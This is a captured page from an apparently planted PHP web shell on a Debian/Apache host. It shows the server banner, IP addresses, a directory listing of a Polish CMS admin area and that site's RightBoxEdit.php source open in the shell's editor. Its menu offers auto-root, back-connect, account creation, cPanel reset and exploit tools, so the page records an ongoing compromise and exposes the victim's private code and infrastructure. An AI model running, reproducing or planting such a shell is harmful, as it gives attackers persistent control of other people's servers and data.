Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.148.115.187
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
protected /
Pages /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
ClassCatalog.page
18.95
KB
-rw-r--r--
ClassCatalog.php
16.13
KB
-rw-r--r--
ClassMaterials.page
2.26
KB
-rw-r--r--
ClassMaterials.php
4.73
KB
-rw-r--r--
ClassSchedule.page
1.58
KB
-rw-r--r--
ClassSchedule.php
1.26
KB
-rw-r--r--
ClassScheduleBlockEdit.page
2.7
KB
-rw-r--r--
ClassScheduleBlockEdit.php
7.7
KB
-rw-r--r--
ContentBrowse.page
1.41
KB
-rw-r--r--
ContentBrowse.php
4.16
KB
-rw-r--r--
GlobalPapersEdit.page
3.43
KB
-rw-r--r--
GlobalPapersList.php
1.37
KB
-rw-r--r--
Home.page
43
B
-rw-r--r--
Login.page
670
B
-rw-r--r--
Login.php
446
B
-rw-r--r--
NewsItemEdit.page
3.1
KB
-rw-r--r--
NewsItemEdit.php
2.25
KB
-rw-r--r--
NewsItemImageEdit.page
1.49
KB
-rw-r--r--
NewsItemImageEdit.php
3.97
KB
-rw-r--r--
NewsItems.page
2.08
KB
-rw-r--r--
NewsItems.php
1.46
KB
-rw-r--r--
PaperCoverEdit.page
1.47
KB
-rw-r--r--
PaperCoverEdit.php
4.08
KB
-rw-r--r--
PapersEdit.page
5.44
KB
-rw-r--r--
PapersEdit.php
12.41
KB
-rw-r--r--
PasswordChange.page
511
B
-rw-r--r--
PasswordChange.php
1.16
KB
-rw-r--r--
RightBoxEdit.page
2.54
KB
-rw-r--r--
RightBoxEdit.php
4.1
KB
-rw-r--r--
RightBoxImageEdit.page
1.47
KB
-rw-r--r--
RightBoxImageEdit.php
4.11
KB
-rw-r--r--
RightBoxesList.page
1.52
KB
-rw-r--r--
RightBoxesList.php
1.47
KB
-rw-r--r--
UserBrowse.page
3.46
KB
-rw-r--r--
UserBrowse.php
2.79
KB
-rw-r--r--
UserCreate.page
1.86
KB
-rw-r--r--
UserCreate.php
1.51
KB
-rw-r--r--
UserEdit.page
8.95
KB
-rw-r--r--
UserEdit.php
8.9
KB
-rw-r--r--
UserPapers.page
3.63
KB
-rw-r--r--
UserPapers.php
1.74
KB
-rw-r--r--
UserPhotoEdit.page
1.5
KB
-rw-r--r--
UserPhotoEdit.php
3.96
KB
-rw-r--r--
config.xml
227
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RightBoxEdit.php
<?php class RightBoxEdit extends KAdminPage { /** @var KRightBox */ private $_RightBox; public function onLoad($p) { parent::onLoad($p); if (is_numeric($this->Request['id'])) { $id = $this->Request['id']; if ((int)$id === -1) { $this->_RightBox = new KRightBox(); $this->_RightBox->setImage_Id(KImage::getNextID()); if (!$this->isPostBack && !$this->isCallBack) { $this->bindData(); } } else { $this->_RightBox = KRightBox::finder()->findByPk($id); if ($this->_RightBox instanceof KRightBox) { if (!$this->isPostBack && !$this->isCallBack) { $this->bindData(); } } else parent::Error('Błędny identyfikator'); } } } /** * @return mixed */ public function getRightBox() { return $this->_RightBox; } public function backToList() { $this->response->redirect($this->Service->constructUrl('Admin.RightBoxesList')); } public function editImage() { $this->response->redirect($this->Service->constructUrl('Admin.RightBoxImageEdit', array('rbid'=>$this->getRightBox()->getId()))); } public function bindData() { // $crit = new TActiveRecordCriteria(); // $crit->setCondition('menu_item = -1 and lang="pl" and type=1'); // $crit->setOrdersBy(['sort_pos'=>'asc']); // $rootItems = KContentItem::finder()->findAll($crit); // // $rootItemIds = []; // foreach ($rootItems as $rootItem) { // $rootItemIds[] = $rootItem->getId(); // } // // $crit = new TActiveRecordCriteria(); // $crit->setCondition('menu_item in ('.implode(',', $rootItemIds).') and lang="pl" and type=20'); // $crit->setOrdersBy(['sort_pos'=>'asc']); // $childItems = KContentItem::finder()->findAll($crit); // // $items = []; // for ($i=0, $iMax = count($rootItems); $i< $iMax; $i++) // { // $rootItem = $rootItems[$i]; // for ($j=0, $jMax = count($childItems); $j< $jMax; $j++) { // if ($childItems[$j]->getMenu_item() == $rootItem->getId()) { // $items[] = [ // 'id' => $childItems[$j]->getId(), // 'title' => $rootItem->getTitle(). ' > '.$childItems[$j]->getTitle() // ]; // } // } // } // $this->FContentItems->setDataSource($items); // $this->FContentItems->dataBind(); // $this->FContentItems->SelectedValue = $this->_RightBox->getContent_item_id(); $this->FUrl->Text = $this->_RightBox->getUrl(); $this->FTitle->Text = $this->_RightBox->getTitle(); $this->FText->Text = $this->_RightBox->getContent(); $this->FSortPos->Text = $this->_RightBox->getSort_pos(); // var_dump($this->_RightBox->getImage()); die; } public function deleteImage() { $this->_RightBox->deleteImage(); $this->Master->messageSuccess('Obrazek usunięty'); } public function saveItem() { if ($this->FTitle->SafeText == '') { $this->Master->messageError('Musisz podać tytuł'); } if ($this->FText->SafeText == '') { $this->Master->messageError('Musisz podać treść'); } if ($this->FUrl->SafeText == '') { $this->Master->messageError('Musisz podać link'); } if ($this->FSortPos->SafeText == '') { $this->FSortPos->SafeText = 0; } $this->_RightBox->setTitle($this->FTitle->SafeText); $this->_RightBox->setContent($this->FText->SafeText); $this->_RightBox->setSort_pos((int)$this->FSortPos->SafeText); $this->_RightBox->setContent_item_id($this->FContentItems->SelectedValue); $this->_RightBox->setUrl($this->FUrl->SafeText); $this->_RightBox->save(); // var_dump($this->_RightBox); die; $this->Master->messageSuccess("Zapisano zmiany"); } } ?>
Close